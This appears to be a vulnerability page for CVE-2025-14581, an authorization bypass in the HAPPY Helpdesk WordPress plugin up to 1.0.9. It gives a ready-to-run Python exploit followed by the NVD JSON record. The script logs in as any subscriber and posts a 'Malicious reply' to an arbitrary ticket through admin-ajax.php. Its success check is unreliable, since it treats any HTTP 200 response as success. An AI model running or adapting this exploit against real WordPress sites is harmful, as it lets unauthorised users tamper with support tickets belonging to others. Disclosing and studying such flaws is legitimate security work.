CVE-2025-14581

import requests # CVE-2025-14581 PoC - HAPPY Helpdesk Support Ticket System Authorization Bypass # Target: WordPress site with HAPPY plugin <= 1.0.9 target_url = "http://target-wordpress-site.com" wp_admin_ajax = f"{target_url}/wp-admin/admin-ajax.php" # Authentication: Use any valid subscriber-level account credentials auth = { "username": "subscriber_user", "password": "user_password" } # Session to maintain authentication session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { "log": auth["username"], "pwd": auth["password"], "wp-submit": "Log In" } response = session.post(login_url, data=login_data) # Step 2: Exploit the authorization bypass # Target arbitrary ticket by manipulating happy_topic_id exploit_data = { "action": "submit_form_reply", "happy_topic_id": "1", # Arbitrary ticket ID "happy_reply_content": "Malicious reply injected via CVE-2025-14581" } response = session.post(wp_admin_ajax, data=exploit_data) if "success" in response.text or response.status_code == 200: print("[+] Authorization bypass successful! Reply submitted to arbitrary ticket.") else: print("[-] Exploitation failed. Check credentials or target.")

{"cve": {"id": "CVE-2025-14581", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:51.560", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HAPPY – Helpdesk Support Ticket System plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the 'submit_form_reply' AJAX action in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit replies to arbitrary support tickets by manipulating the 'happy_topic_id' parameter, regardless of whether they are the ticket owner or have been assigned to the ticket."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/happy-helpdesk-support-ticket-system/tags/1.0.9/inc/happy-replies.php#L585", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/happy-helpdesk-support-ticket-system/trunk/inc/happy-replies.php#L585", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417847%40happy-helpdesk-support-ticket-system&new=3417847%40happy-helpdesk-support-ticket-system&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3967b5ce-f0f8-4620-8883-0857aeee8f8b?source=cve", "source": "[email protected]"}]}}